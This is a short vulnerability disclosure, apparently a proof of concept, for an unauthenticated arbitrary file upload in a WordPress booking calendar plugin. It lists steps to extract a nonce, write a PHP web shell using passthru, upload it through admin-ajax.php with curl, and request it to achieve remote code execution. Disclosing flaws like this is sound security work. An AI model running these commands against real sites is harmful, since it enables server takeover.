The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:
echo '<?php passthru("id"); ?>' > /tmp/poc.php
4. Upload the payload with cURL, with the previously extracted nonce:
curl -i https://example.com/wp-admin/admin-ajax.php \
-F 'action=wpdevart_form_ajax' \
-F 'wpdevart_id=x' \
-F 'wpdevart_nonce=<NONCE HERE>' \
-F 'wpdevart_data={"wpdevart-submit":"X"}' \
-F 'wpdevart-submit=1' \
-F 'file=@/tmp/poc.php'
5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php